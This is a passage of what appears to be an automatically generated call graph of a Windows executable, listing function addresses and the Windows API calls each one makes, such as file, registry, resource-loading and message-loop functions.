e0fdfa 95045->95046 95050 e0fdfc 95045->95050 95150 e14ead 7 API calls 2 library calls 95045->95150 95046->94972 95048 e1066d 95152 e132a4 RaiseException 95048->95152 95050->95048 95151 e132a4 RaiseException 95050->95151 95051 e1068a 95051->94972 95072 dfec76 ISource 95053->95072 95054 e100a3 29 API calls pre_c_initialization 95054->95072 95055 e0fddb 22 API calls 95055->95072 95056 dffef7 95069 dfed9d ISource 95056->95069 95156 dfa8c7 22 API calls __fread_nolock 95056->95156 95058 e44beb 95160 e6359c 82 API calls __wsopen_s 95058->95160 95060 e44600 95060->95069 95155 dfa8c7 22 API calls __fread_nolock 95060->95155 95061 e44b0b 95158 e6359c 82 API calls __wsopen_s 95061->95158 95062 dfa8c7 22 API calls 95062->95072 95068 e10242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95068->95072 95069->94972 95070 dffbe3 95070->95069 95073 e44bdc 95070->95073 95076 dff3ae ISource 95070->95076 95071 dfa961 22 API calls 95071->95072 95072->95054 95072->95055 95072->95056 95072->95058 95072->95060 95072->95061 95072->95062 95072->95068 95072->95069 95072->95070 95072->95071 95075 e101f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 95072->95075 95072->95076 95153 e001e0 181 API calls 2 library calls 95072->95153 95154 e006a0 41 API calls ISource 95072->95154 95159 e6359c 82 API calls __wsopen_s 95073->95159 95075->95072 95076->95069 95157 e6359c 82 API calls __wsopen_s 95076->95157 95077->94982 95078->94940 95080 df9cc2 _wcslen 95079->95080 95081 e0fe0b 22 API calls 95080->95081 95082 df9cea __fread_nolock 95081->95082 95083 e0fddb 22 API calls 95082->95083 95084 df9d00 95083->95084 95084->94952 95085->94947 95086->94965 95087->94965 95088->94942 95089->94976 95090->94976 95091->94976 95092->94974 95093->94979 95094->94976 95095->95021 95096->95019 95097->95024 95098->95026 95100 dfb578 95099->95100 95102 dfb57f 95099->95102 95100->95102 95104 e162d1 39 API calls _strftime 95100->95104 95102->95029 95103 dfb5c2 95103->95029 95104->95103 95106 dfaceb 23 API calls 95105->95106 95107 e82af3 95106->95107 95108 e82b1d 95107->95108 95109 e82aff 95107->95109 95117 df6b57 95108->95117 95115 df7510 53 API calls 95109->95115 95112 e82b1b 95112->95036 95113 e82b0c 95113->95112 95116 dfa8c7 22 API calls __fread_nolock 95113->95116 95115->95113 95116->95112 95118 e34ba1 95117->95118 95119 df6b67 _wcslen 95117->95119 95130 df93b2 95118->95130 95122 df6b7d 95119->95122 95123 df6ba2 95119->95123 95121 e34baa 95121->95121 95129 df6f34 22 API calls 95122->95129 95124 e0fddb 22 API calls 95123->95124 95126 df6bae 95124->95126 95127 e0fe0b 22 API calls 95126->95127 95128 df6b85 __fread_nolock 95127->95128 95128->95112 95129->95128 95131 df93c9 __fread_nolock 95130->95131 95132 df93c0 95130->95132 95131->95121 95132->95131 95134 dfaec9 95132->95134 95135 dfaedc 95134->95135 95136 dfaed9 __fread_nolock 95134->95136 95137 e0fddb 22 API calls 95135->95137 95136->95131 95138 dfaee7 95137->95138 95139 e0fe0b 22 API calls 95138->95139 95139->95136 95141 e5e9f9 95140->95141 95142 e5e988 95140->95142 95141->95042 95143 e5e98a Sleep 95142->95143 95145 e5e993 QueryPerformanceCounter 95142->95145 95143->95141 95145->95143 95146 e5e9a1 QueryPerformanceFrequency 95145->95146 95147 e5e9ab Sleep QueryPerformanceCounter 95146->95147 95148 e5e9ec 95147->95148 95148->95147 95149 e5e9f0 95148->95149 95149->95141 95150->95045 95151->95048 95152->95051 95153->95072 95154->95072 95155->95069 95156->95069 95157->95069 95158->95069 95159->95058 95160->95069 95161->94997 95162->94997 95163 e28402 95168 e281be 95163->95168 95165 e2842a 95169 e281ef try_get_first_available_module 95168->95169 95176 e28338 95169->95176 95183 e18e0b 40 API calls 2 library calls 95169->95183 95171 e283ee 95187 e227ec 26 API calls ___std_exception_copy 95171->95187 95173 e28343 95173->95165 95180 e30984 95173->95180 95175 e2838c 95175->95176 95184 e18e0b 40 API calls 2 library calls 95175->95184 95176->95173 95186 e1f2d9 20 API calls _abort 95176->95186 95178 e283ab 95178->95176 95185 e18e0b 40 API calls 2 library calls 95178->95185 95188 e30081 95180->95188 95182 e3099f 95182->95165 95183->95175 95184->95178 95185->95176 95186->95171 95187->95173 95189 e3008d ___BuildCatchObject 95188->95189 95190 e3009b 95189->95190 95193 e300d4 95189->95193 95246 e1f2d9 20 API calls _abort 95190->95246 95192 e300a0 95247 e227ec 26 API calls ___std_exception_copy 95192->95247 95199 e3065b 95193->95199 95198 e300aa __fread_nolock 95198->95182 95249 e3042f 95199->95249 95202 e306a6 95267 e25221 95202->95267 95203 e3068d 95281 e1f2c6 20 API calls _abort 95203->95281 95206 e30692 95282 e1f2d9 20 API calls _abort 95206->95282 95207 e306ab 95208 e306b4 95207->95208 95209 e306cb 95207->95209 95283 e1f2c6 20 API calls _abort 95208->95283 95280 e3039a CreateFileW 95209->95280 95213 e306b9 95284 e1f2d9 20 API calls _abort 95213->95284 95214 e30781 GetFileType 95217 e307d3 95214->95217 95218 e3078c GetLastError 95214->95218 95216 e30756 GetLastError 95286 e1f2a3 20 API calls __dosmaperr 95216->95286 95289 e2516a 21 API calls 2 library calls 95217->95289 95287 e1f2a3 20 API calls __dosmaperr 95218->95287 95219 e30704 95219->95214 95219->95216 95285 e3039a CreateFileW 95219->95285 95223 e3079a CloseHandle 95223->95206 95226 e307c3 95223->95226 95225 e30749 95225->95214 95225->95216 95288 e1f2d9 20 API calls _abort 95226->95288 95228 e307f4 95230 e30840 95228->95230 95290 e305ab 72 API calls 3 library calls 95228->95290 95229 e307c8 95229->95206 95234 e3086d 95230->95234 95291 e3014d 72 API calls 4 library calls 95230->95291 95233 e30866 95233->95234 95235 e3087e 95233->95235 95292 e286ae 95234->95292 95237 e300f8 95235->95237 95238 e308fc CloseHandle 95235->95238 95248 e30121 LeaveCriticalSection __wsopen_s 95237->95248 95307 e3039a CreateFileW 95238->95307 95240 e30927 95241 e3095d 95240->95241 95242 e30931 GetLastError 95240->95242 95241->95237 95308 e1f2a3 20 API calls __dosmaperr 95242->95308 95244 e3093d 95309 e25333 21 API calls 2 library calls 95244->95309 95246->95192 95247->95198 95248->95198 95250 e30450 95249->95250 95251 e3046a 95249->95251 95250->95251 95317 e1f2d9 20 API calls _abort 95250->95317 95310 e303bf 95251->95310 95254 e3045f 95318 e227ec 26 API calls ___std_exception_copy 95254->95318 95256 e304a2 95257 e304d1 95256->95257 95319 e1f2d9 20 API calls _abort 95256->95319 95264 e30524 95257->95264 95321 e1d70d 26 API calls 2 library calls 95257->95321 95260 e3051f 95262 e3059e 95260->95262 95260->95264 95261 e304c6 95320 e227ec 26 API calls ___std_exception_copy 95261->95320 95322 e227fc 11 API calls _abort 95262->95322 95264->95202 95264->95203 95266 e305aa 95268 e2522d ___BuildCatchObject 95267->95268 95325 e22f5e EnterCriticalSection 95268->95325 95270 e25259 95329 e25000 21 API calls 3 library calls 95270->95329 95271 e25234 95271->95270 95276 e252c7 EnterCriticalSection 95271->95276 95278 e2527b 95271->95278 95274 e252a4 __fread_nolock 95274->95207 95275 e2525e 95275->95278 95330 e25147 EnterCriticalSection 95275->95330 95277 e252d4 LeaveCriticalSection 95276->95277 95276->95278 95277->95271 95326 e2532a 95278->95326 95280->95219 95281->95206 95282->95237 95283->95213 95284->95206 95285->95225 95286->95206 95287->95223 95288->95229 95289->95228 95290->95230 95291->95233 95332 e253c4 95292->95332 95294 e286c4 95345 e25333 21 API calls 2 library calls 95294->95345 95296 e286be 95296->95294 95299 e253c4 __wsopen_s 26 API calls 95296->95299 95306 e286f6 95296->95306 95297 e253c4 __wsopen_s 26 API calls 95300 e28702 CloseHandle 95297->95300 95298 e2871c 95305 e2873e 95298->95305 95346 e1f2a3 20 API calls __dosmaperr 95298->95346 95301 e286ed 95299->95301 95300->95294 95303 e2870e GetLastError 95300->95303 95302 e253c4 __wsopen_s 26 API calls 95301->95302 95302->95306 95303->95294 95305->95237 95306->95294 95306->95297 95307->95240 95308->95244 95309->95241 95312 e303d7 95310->95312 95311 e303f2 95311->95256 95312->95311 95323 e1f2d9 20 API calls _abort 95312->95323 95314 e30416 95324 e227ec 26 API calls ___std_exception_copy 95314->95324 95316 e30421 95316->95256 95317->95254 95318->95251 95319->95261 95320->95257 95321->95260 95322->95266 95323->95314 95324->95316 95325->95271 95331 e22fa6 LeaveCriticalSection 95326->95331 95328 e25331 95328->95274 95329->95275 95330->95278 95331->95328 95333 e253d1 95332->95333 95335 e253e6 95332->95335 95347 e1f2c6 20 API calls _abort 95333->95347 95338 e2540b 95335->95338 95349 e1f2c6 20 API calls _abort 95335->95349 95337 e253d6 95348 e1f2d9 20 API calls _abort 95337->95348 95338->95296 95339 e25416 95350 e1f2d9 20 API calls _abort 95339->95350 95342 e253de 95342->95296 95343 e2541e 95351 e227ec 26 API calls ___std_exception_copy 95343->95351 95345->95298 95346->95305 95347->95337 95348->95342 95349->95339 95350->95343 95351->95342 95352 dfdefc 95355 df1d6f 95352->95355 95354 dfdf07 95356 df1d8c 95355->95356 95364 df1f6f 95356->95364 95358 df1da6 95359 e32759 95358->95359 95361 df1e36 95358->95361 95362 df1dc2 95358->95362 95368 e6359c 82 API calls __wsopen_s 95359->95368 95361->95354 95362->95361 95367 df289a 23 API calls 95362->95367 95365 dfec40 181 API calls 95364->95365 95366 df1f98 95365->95366 95366->95358 95367->95361 95368->95361 95369 df105b 95374 df344d 95369->95374 95371 df106a 95405 e100a3 29 API calls __onexit 95371->95405 95373 df1074 95375 df345d __wsopen_s 95374->95375 95406 dfa961 95375->95406 95379 df351c 95418 df3357 95379->95418 95386 dfa961 22 API calls 95387 df354d 95386->95387 95439 dfa6c3 95387->95439 95390 e33176 RegQueryValueExW 95391 e33193 95390->95391 95392 e3320c RegCloseKey 95390->95392 95393 e0fe0b 22 API calls 95391->95393 95394 df3578 95392->95394 95404 e3321e _wcslen 95392->95404 95395 e331ac 95393->95395 95394->95371 95445 df5722 95395->95445 95398 e331d4 95399 df6b57 22 API calls 95398->95399 95401 e331ee ISource 95399->95401 95400 df4c6d 22 API calls 95400->95404 95401->95392 95402 df9cb3 22 API calls 95402->95404 95403 df515f 22 API calls 95403->95404 95404->95394 95404->95400 95404->95402 95404->95403 95405->95373 95407 e0fe0b 22 API calls 95406->95407 95408 dfa976 95407->95408 95409 e0fddb 22 API calls 95408->95409 95410 df3513 95409->95410 95411 df3a5a 95410->95411 95448 e31f50 95411->95448 95414 df9cb3 22 API calls 95415 df3a8d 95414->95415 95450 df3aa2 95415->95450 95417 df3a97 95417->95379 95419 e31f50 __wsopen_s 95418->95419 95420 df3364 GetFullPathNameW 95419->95420 95421 df3386 95420->95421 95422 df6b57 22 API calls 95421->95422 95423 df33a4 95422->95423 95424 df33c6 95423->95424 95425 df33dd 95424->95425 95426 e330bb 95424->95426 95464 df33ee 95425->95464 95428 e0fddb 22 API calls 95426->95428 95430 e330c5 _wcslen 95428->95430 95429 df33e8 95433 df515f 95429->95433 95431 e0fe0b 22 API calls 95430->95431 95432 e330fe __fread_nolock 95431->95432 95434 df516e 95433->95434 95438 df518f __fread_nolock 95433->95438 95436 e0fe0b 22 API calls 95434->95436 95435 e0fddb 22 API calls 95437 df3544 95435->95437 95436->95438 95437->95386 95438->95435 95440 dfa6dd 95439->95440 95441 df3556 RegOpenKeyExW 95439->95441 95442 e0fddb 22 API calls 95440->95442 95441->95390 95441->95394 95443 dfa6e7 95442->95443 95444 e0fe0b 22 API calls 95443->95444 95444->95441 95446 e0fddb 22 API calls 95445->95446 95447 df5734 RegQueryValueExW 95446->95447 95447->95398 95447->95401 95449 df3a67 GetModuleFileNameW 95448->95449 95449->95414 95451 e31f50 __wsopen_s 95450->95451 95452 df3aaf GetFullPathNameW 95451->95452 95453 df3ace 95452->95453 95454 df3ae9 95452->95454 95455 df6b57 22 API calls 95453->95455 95456 dfa6c3 22 API calls 95454->95456 95457 df3ada 95455->95457 95456->95457 95460 df37a0 95457->95460 95461 df37ae 95460->95461 95462 df93b2 22 API calls 95461->95462 95463 df37c2 95462->95463 95463->95417 95465 df33fe _wcslen 95464->95465 95466 e3311d 95465->95466 95467 df3411 95465->95467 95468 e0fddb 22 API calls 95466->95468 95474 dfa587 95467->95474 95471 e33127 95468->95471 95470 df341e __fread_nolock 95470->95429 95472 e0fe0b 22 API calls 95471->95472 95473 e33157 __fread_nolock 95472->95473 95475 dfa59d 95474->95475 95478 dfa598 __fread_nolock 95474->95478 95476 e3f80f 95475->95476 95477 e0fe0b 22 API calls 95475->95477 95477->95478 95478->95470 95479 e42a00 95495 dfd7b0 ISource 95479->95495 95480 dfdb11 PeekMessageW 95480->95495 95481 dfd807 GetInputState 95481->95480 95481->95495 95482 e41cbe TranslateAcceleratorW 95482->95495 95484 dfdb8f PeekMessageW 95484->95495 95485 dfda04 timeGetTime 95485->95495 95486 dfdb73 TranslateMessage DispatchMessageW 95486->95484 95487 dfdbaf Sleep 95487->95495 95488 e42b74 Sleep 95501 e42a51 95488->95501 95491 e41dda timeGetTime 95583 e0e300 23 API calls 95491->95583 95494 e42c0b GetExitCodeProcess 95499 e42c37 CloseHandle 95494->95499 95500 e42c21 WaitForSingleObject 95494->95500 95495->95480 95495->95481 95495->95482 95495->95484 95495->95485 95495->95486 95495->95487 95495->95488 95495->95491 95496 dfd9d5 95495->95496 95495->95501 95503 e5e97b 5 API calls 95495->95503 95506 dfec40 181 API calls 95495->95506 95508 e01310 181 API calls 95495->95508 95511 dfdd50 95495->95511 95518 dfbf40 95495->95518 95576 e0edf6 95495->95576 95581 dfdfd0 181 API calls 3 library calls 95495->95581 95582 e0e551 timeGetTime 95495->95582 95584 e63a2a 23 API calls 95495->95584 95585 e6359c 82 API calls __wsopen_s 95495->95585 95586 e75658 23 API calls 95495->95586 95497 e829bf GetForegroundWindow 95497->95501 95499->95501 95500->95495 95500->95499 95501->95494 95501->95495 95501->95496 95501->95497 95502 e42ca9 Sleep 95501->95502 95587 e0e551 timeGetTime 95501->95587 95588 e5d4dc 47 API calls 95501->95588 95502->95495 95503->95495 95506->95495 95508->95495 95512 dfdd6f 95511->95512 95513 dfdd83 95511->95513 95589 dfd260 181 API calls 2 library calls 95512->95589 95590 e6359c 82 API calls __wsopen_s 95513->95590 95515 dfdd7a 95515->95495 95517 e42f75 95517->95517 95591 dfadf0 95518->95591 95520 dfbf9d 95521 e404b6 95520->95521 95522 dfbfa9 95520->95522 95609 e6359c 82 API calls __wsopen_s 95521->95609 95524 dfc01e 95522->95524 95525 e404c6 95522->95525 95596 dfac91 95524->95596 95610 e6359c 82 API calls __wsopen_s 95525->95610 95528 e404f5 95545 e4055a 95528->95545 95611 e0d217 181 API calls 95528->95611 95530 dfc7da 95533 e0fe0b 22 API calls 95530->95533 95538 dfc808 __fread_nolock 95533->95538 95537 dfc039 ISource __fread_nolock 95537->95528 95537->95530 95537->95538 95540 dfaf8a 22 API calls 95537->95540 95541 e57120 22 API calls 95537->95541 95542 e4091a 95537->95542 95537->95545 95546 dfec40 181 API calls 95537->95546 95547 e408a5 95537->95547 95551 e40591 95537->95551 95555 e408f6 95537->95555 95556 dfbbe0 40 API calls 95537->95556 95558 dfc237 95537->95558 95559 dfaceb 23 API calls 95537->95559 95562 e0fe0b 22 API calls 95537->95562 95563 dfc603 95537->95563 95565 e0fddb 22 API calls 95537->95565 95570 e409bf 95537->95570 95600 dfad81 95537->95600 95614 e57099 22 API calls __fread_nolock 95537->95614 95615 e75745 54 API calls _wcslen 95537->95615 95616 e0aa42 22 API calls ISource 95537->95616 95617 e5f05c 40 API calls 95537->95617 95618 dfa993 41 API calls 95537->95618 95539 e0fe0b 22 API calls 95538->95539 95574 dfc350 ISource __fread_nolock 95539->95574 95540->95537 95541->95537 95621 e63209 23 API calls 95542->95621 95545->95563 95612 e6359c 82 API calls __wsopen_s 95545->95612 95546->95537 95548 dfec40 181 API calls 95547->95548 95549 e408cf 95548->95549 95549->95563 95619 dfa81b 41 API calls 95549->95619 95613 e6359c 82 API calls __wsopen_s 95551->95613 95620 e6359c 82 API calls __wsopen_s 95555->95620 95556->95537 95560 dfc253 95558->95560 95622 dfa8c7 22 API calls __fread_nolock 95558->95622 95559->95537 95566 e40976 95560->95566 95568 dfc297 ISource 95560->95568 95562->95537 95563->95495 95565->95537 95567 dfaceb 23 API calls 95566->95567 95567->95570 95569 dfaceb 23 API calls 95568->95569 95568->95570 95571 dfc335 95569->95571 95570->95563 95623 e6359c 82 API calls __wsopen_s 95570->95623 95571->95570 95572 dfc342 95571->95572 95607 dfa704 22 API calls ISource 95572->95607 95575 dfc3ac 95574->95575 95608 e0ce17 22 API calls ISource 95574->95608 95575->95495 95577 e0ee09 95576->95577 95578 e0ee12 95576->95578 95577->95495 95578->95577 95579 e0ee36 IsDialogMessageW 95578->95579 95580 e4efaf GetClassLongW 95578->95580 95579->95577 95579->95578 95580->95578 95580->95579 95581->95495 95582->95495 95583->95495 95584->95495 95585->95495 95586->95495 95587->95501 95588->95501 95589->95515 95590->95517 95592 dfae01 95591->95592 95595 dfae1c ISource 95591->95595 95593 dfaec9 22 API calls 95592->95593 95594 dfae09 CharUpperBuffW 95593->95594 95594->95595 95595->95520 95597 dfacae 95596->95597 95598 dfacd1 95597->95598 95624 e6359c 82 API calls __wsopen_s 95597->95624 95598->95537 95601 e3fadb 95600->95601 95602 dfad92 95600->95602 95603 e0fddb 22 API calls 95602->95603 95604 dfad99 95603->95604 95625 dfadcd 95604->95625 95607->95574 95608->95574 95609->95525 95610->95563 95611->95545 95612->95563 95613->95563 95614->95537 95615->95537 95616->95537 95617->95537 95618->95537 95619->95555 95620->95563 95621->95558 95622->95560 95623->95563 95624->95598 95628 dfaddd 95625->95628 95626 dfadb6 95626->95537 95627 e0fddb 22 API calls 95627->95628 95628->95626 95628->95627 95629 dfa961 22 API calls 95628->95629 95631 dfadcd 22 API calls 95628->95631 95632 dfa8c7 22 API calls __fread_nolock 95628->95632 95629->95628 95631->95628 95632->95628 95633 e32ba5 95634 df2b25 95633->95634 95635 e32baf 95633->95635 95661 df2b83 7 API calls 95634->95661 95637 df3a5a 24 API calls 95635->95637 95639 e32bb8 95637->95639 95641 df9cb3 22 API calls 95639->95641 95642 e32bc6 95641->95642 95644 e32bf5 95642->95644 95645 e32bce 95642->95645 95643 df2b2f 95653 df2b44 95643->95653 95665 df3837 95643->95665 95648 df33c6 22 API calls 95644->95648 95647 df33c6 22 API calls 95645->95647 95649 e32bd9 95647->95649 95650 e32bf1 GetForegroundWindow ShellExecuteW 95648->95650 95676 df6350 22 API calls 95649->95676 95657 e32c26 95650->95657 95652 df2b5f 95659 df2b66 SetCurrentDirectoryW 95652->95659 95653->95652 95675 df30f2 Shell_NotifyIconW ___scrt_fastfail 95653->95675 95655 e32be7 95658 df33c6 22 API calls 95655->95658 95657->95652 95658->95650 95660 df2b7a 95659->95660 95677 df2cd4 7 API calls 95661->95677 95663 df2b2a 95664 df2c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 95663->95664 95664->95643 95666 df3862 ___scrt_fastfail 95665->95666 95678 df4212 95666->95678 95668 df38e8 95671 e33386 Shell_NotifyIconW 95668->95671 95672 df3906 Shell_NotifyIconW 95668->95672 95682 df3923 95672->95682 95674 df391c 95674->95653 95675->95652 95676->95655 95677->95663 95679 e335a4 95678->95679 95680 df38b7 95678->95680 95679->95680 95681 e335ad DestroyIcon 95679->95681 95680->95668 95704 e5c874 42 API calls _strftime 95680->95704 95681->95680 95683 df393f 95682->95683 95684 df3a13 95682->95684 95705 df6270 95683->95705 95684->95674 95687 e33393 LoadStringW 95690 e333ad 95687->95690 95688 df395a 95689 df6b57 22 API calls 95688->95689 95691 df396f 95689->95691 95698 df3994 ___scrt_fastfail 95690->95698 95711 dfa8c7 22 API calls __fread_nolock 95690->95711 95692 df397c 95691->95692 95693 e333c9 95691->95693 95692->95690 95695 df3986 95692->95695 95712 df6350 22 API calls 95693->95712 95710 df6350 22 API calls 95695->95710 95701 df39f9 Shell_NotifyIconW 95698->95701 95699 e333d7 95699->95698 95700 df33c6 22 API calls 95699->95700 95702 e333f9 95700->95702 95701->95684 95703 df33c6 22 API calls 95702->95703 95703->95698 95704->95668 95706 e0fe0b 22 API calls 95705->95706 95707 df6295 95706->95707 95708 e0fddb 22 API calls 95707->95708 95709 df394d 95708->95709 95709->95687 95709->95688 95710->95698 95711->95698 95712->95699 95713 df1098 95718 df42de 95713->95718 95717 df10a7 95719 dfa961 22 API calls 95718->95719 95720 df42f5 GetVersionExW 95719->95720 95721 df6b57 22 API calls 95720->95721 95722 df4342 95721->95722 95723 df93b2 22 API calls 95722->95723 95727 df4378 95722->95727 95724 df436c 95723->95724 95726 df37a0 22 API calls 95724->95726 95725 df441b GetCurrentProcess IsWow64Process 95728 df4437 95725->95728 95726->95727 95727->95725 95735 e337df 95727->95735 95729 df444f LoadLibraryA 95728->95729 95730 e33824 GetSystemInfo 95728->95730 95731 df449c GetSystemInfo 95729->95731 95732 df4460 GetProcAddress 95729->95732 95734 df4476 95731->95734 95732->95731 95733 df4470 GetNativeSystemInfo 95732->95733 95733->95734 95736 df447a FreeLibrary 95734->95736 95737 df109d 95734->95737 95736->95737 95738 e100a3 29 API calls __onexit 95737->95738 95738->95717 95739 df2e37 95740 dfa961 22 API calls 95739->95740 95741 df2e4d 95740->95741 95818 df4ae3 95741->95818 95743 df2e6b 95744 df3a5a 24 API calls 95743->95744 95745 df2e7f 95744->95745 95746 df9cb3 22 API calls 95745->95746 95747 df2e8c 95746->95747 95832 df4ecb 95747->95832 95750 df2ead 95854 dfa8c7 22 API calls __fread_nolock 95750->95854 95751 e32cb0 95872 e62cf9 95751->95872 95753 e32cc3 95755 e32ccf 95753->95755 95898 df4f39 95753->95898 95759 df4f39 68 API calls 95755->95759 95757 df2ec3 95855 df6f88 22 API calls 95757->95855 95761 e32ce5 95759->95761 95760 df2ecf 95762 df9cb3 22 API calls 95760->95762 95904 df3084 22 API calls 95761->95904 95763 df2edc 95762->95763 95856 dfa81b 41 API calls 95763->95856 95766 df2eec 95768 df9cb3 22 API calls 95766->95768 95767 e32d02 95905 df3084 22 API calls 95767->95905 95769 df2f12 95768->95769 95857 dfa81b 41 API calls 95769->95857 95772 e32d1e 95773 df3a5a 24 API calls 95772->95773 95774 e32d44 95773->95774 95906 df3084 22 API calls 95774->95906 95775 df2f21 95778 dfa961 22 API calls 95775->95778 95777 e32d50 95907 dfa8c7 22 API calls __fread_nolock 95777->95907 95780 df2f3f 95778->95780 95858 df3084 22 API calls 95780->95858 95781 e32d5e 95908 df3084 22 API calls 95781->95908 95784 df2f4b 95859 e14a28 40 API calls 3 library calls 95784->95859 95785 e32d6d 95909 dfa8c7 22 API calls __fread_nolock 95785->95909 95787 df2f59 95787->95761 95788 df2f63 95787->95788 95860 e14a28 40 API calls 3 library calls 95788->95860 95791 df2f6e 95791->95767 95793 df2f78 95791->95793 95792 e32d83 95910 df3084 22 API calls 95792->95910 95861 e14a28 40 API calls 3 library calls 95793->95861 95796 e32d90 95797 df2f83 95797->95772 95798 df2f8d 95797->95798 95862 e14a28 40 API calls 3 library calls 95798->95862 95800 df2fdc 95800->95785 95801 df2fe8 95800->95801 95801->95796 95866 df63eb 22 API calls 95801->95866 95802 df2f98 95802->95800 95863 df3084 22 API calls 95802->95863 95805 df2fbf 95864 dfa8c7 22 API calls __fread_nolock 95805->95864 95806 df2ff8 95867 df6a50 22 API calls 95806->95867 95809 df2fcd 95865 df3084 22 API calls 95809->95865 95811 df3006 95868 df70b0 23 API calls 95811->95868 95815 df3021 95816 df3065 95815->95816 95869 df6f88 22 API calls 95815->95869 95870 df70b0 23 API calls 95815->95870 95871 df3084 22 API calls 95815->95871 95819 df4af0 __wsopen_s 95818->95819 95820 df6b57 22 API calls 95819->95820 95821 df4b22 95819->95821 95820->95821 95831 df4b58 95821->95831 95911 df4c6d 95821->95911 95823 df9cb3 22 API calls 95825 df4c52 95823->95825 95824 df9cb3 22 API calls 95824->95831 95827 df515f 22 API calls 95825->95827 95826 df4c6d 22 API calls 95826->95831 95829 df4c5e 95827->95829 95828 df515f 22 API calls 95828->95831 95829->95743 95830 df4c29 95830->95823 95830->95829 95831->95824 95831->95826 95831->95828 95831->95830 95914 df4e90 LoadLibraryA 95832->95914 95837 df4ef6 LoadLibraryExW 95922 df4e59 LoadLibraryA 95837->95922 95838 e33ccf 95840 df4f39 68 API calls 95838->95840 95842 e33cd6 95840->95842 95844 df4e59 3 API calls 95842->95844 95846 e33cde 95844->95846 95845 df4f20 95845->95846 95847 df4f2c 95845->95847 95944 df50f5 40 API calls __fread_nolock 95846->95944 95849 df4f39 68 API calls 95847->95849 95851 df2ea5 95849->95851 95850 e33cf5 95945 e628fe 27 API calls 95850->95945 95851->95750 95851->95751 95853 e33d05 95854->95757 95855->95760 95856->95766 95857->95775 95858->95784 95859->95787 95860->95791 95861->95797 95862->95802 95863->95805 95864->95809 95865->95800 95866->95806 95867->95811 95868->95815 95869->95815 95870->95815 95871->95815 95873 e62d15 95872->95873 96018 df511f 64 API calls 95873->96018 95875 e62d29 96019 e62e66 75 API calls 95875->96019 95877 e62d3b 95878 e62d3f 95877->95878 96020 df50f5 40 API calls __fread_nolock 95877->96020 95878->95753 95880 e62d56 96021 df50f5 40 API calls __fread_nolock 95880->96021 95882 e62d66 96022 df50f5 40 API calls __fread_nolock 95882->96022 95884 e62d81 96023 df50f5 40 API calls __fread_nolock 95884->96023 95886 e62d9c 96024 df511f 64 API calls 95886->96024 95888 e62db3 95889 e1ea0c ___std_exception_copy 21 API calls 95888->95889 95890 e62dba 95889->95890 95891 e1ea0c ___std_exception_copy 21 API calls 95890->95891 95892 e62dc4 95891->95892 96025 df50f5 40 API calls __fread_nolock 95892->96025 95894 e62dd8 96026 e628fe 27 API calls 95894->96026 95896 e62dee 95896->95878 96027 e622ce 95896->96027 95899 df4f4a 95898->95899 95900 df4f43 95898->95900 95902 df4f6a FreeLibrary 95899->95902 95903 df4f59 95899->95903 95901 e1e678 67 API calls 95900->95901 95901->95899 95902->95903 95903->95755 95904->95767 95905->95772 95906->95777 95907->95781 95908->95785 95909->95792 95910->95796 95912 dfaec9 22 API calls 95911->95912 95913 df4c78 95912->95913 95913->95821 95915 df4ea8 GetProcAddress 95914->95915 95916 df4ec6 95914->95916 95917 df4eb8 95915->95917 95919 e1e5eb 95916->95919 95917->95916 95918 df4ebf FreeLibrary 95917->95918 95918->95916 95946 e1e52a 95919->95946 95921 df4eea 95921->95837 95921->95838 95923 df4e6e GetProcAddress 95922->95923 95924 df4e8d 95922->95924 95925 df4e7e 95923->95925 95927 df4f80 95924->95927 95925->95924 95926 df4e86 FreeLibrary 95925->95926 95926->95924 95928 e0fe0b 22 API calls 95927->95928 95929 df4f95 95928->95929 95930 df5722 22 API calls 95929->95930 95931 df4fa1 __fread_nolock 95930->95931 95932 df50a5 95931->95932 95933 e33d1d 95931->95933 95943 df4fdc 95931->95943 96007 df42a2 CreateStreamOnHGlobal 95932->96007 96015 e6304d 74 API calls 95933->96015 95936 e33d22 96016 df511f 64 API calls 95936->96016 95939 e33d45 96017 df50f5 40 API calls __fread_nolock 95939->96017 95941 df506e ISource 95941->95845 95943->95936 95943->95941 96013 df50f5 40 API calls __fread_nolock 95943->96013 96014 df511f 64 API calls 95943->96014 95944->95850 95945->95853 95949 e1e536 ___BuildCatchObject 95946->95949 95947 e1e544 95971 e1f2d9 20 API calls _abort 95947->95971 95949->95947 95951 e1e574 95949->95951 95950 e1e549 95972 e227ec 26 API calls ___std_exception_copy 95950->95972 95953 e1e586 95951->95953 95954 e1e579 95951->95954 95963 e28061 95953->95963 95973 e1f2d9 20 API calls _abort 95954->95973 95957 e1e554 __fread_nolock 95957->95921 95958 e1e58f 95959 e1e5a2 95958->95959 95960 e1e595 95958->95960 95975 e1e5d4 LeaveCriticalSection __fread_nolock 95959->95975 95974 e1f2d9 20 API calls _abort 95960->95974 95964 e2806d ___BuildCatchObject 95963->95964 95976 e22f5e EnterCriticalSection 95964->95976 95966 e2807b 95977 e280fb 95966->95977 95970 e280ac __fread_nolock 95970->95958 95971->95950 95972->95957 95973->95957 95974->95957 95975->95957 95976->95966 95985 e2811e 95977->95985 95978 e28088 95991 e280b7 95978->95991 95979 e28177 95996 e24c7d 20 API calls 2 library calls 95979->95996 95982 e28180 95997 e229c8 95982->95997 95984 e28189 95984->95978 96003 e23405 11 API calls 2 library calls 95984->96003 95985->95978 95985->95979 95985->95985 95994 e1918d EnterCriticalSection 95985->95994 95995 e191a1 LeaveCriticalSection 95985->95995 95987 e281a8 96004 e1918d EnterCriticalSection 95987->96004 95990 e281bb 95990->95978 96006 e22fa6 LeaveCriticalSection 95991->96006 95993 e280be 95993->95970 95994->95985 95995->95985 95996->95982 95998 e229d3 RtlFreeHeap 95997->95998 95999 e229fc __dosmaperr 95997->95999 95998->95999 96000 e229e8 95998->96000 95999->95984 96005 e1f2d9 20 API calls _abort 96000->96005 96002 e229ee GetLastError 96002->95999 96003->95987 96004->95990 96005->96002 96006->95993 96008 df42bc FindResourceExW 96007->96008 96009 df42d9 96007->96009 96008->96009 96010 e335ba LoadResource 96008->96010 96009->95943 96010->96009 96011 e335cf SizeofResource 96010->96011 96011->96009 96012 e335e3 LockResource 96011->96012 96012->96009 96013->95943 96014->95943 96015->95936 96016->95939 96017->95941 96018->95875 96019->95877 96020->95880 96021->95882 96022->95884 96023->95886 96024->95888 96025->95894 96026->95896 96028 e622e7 96027->96028 96029 e622d9 96027->96029 96031 e6232c 96028->96031 96032 e1e5eb 29 API calls 96028->96032 96050 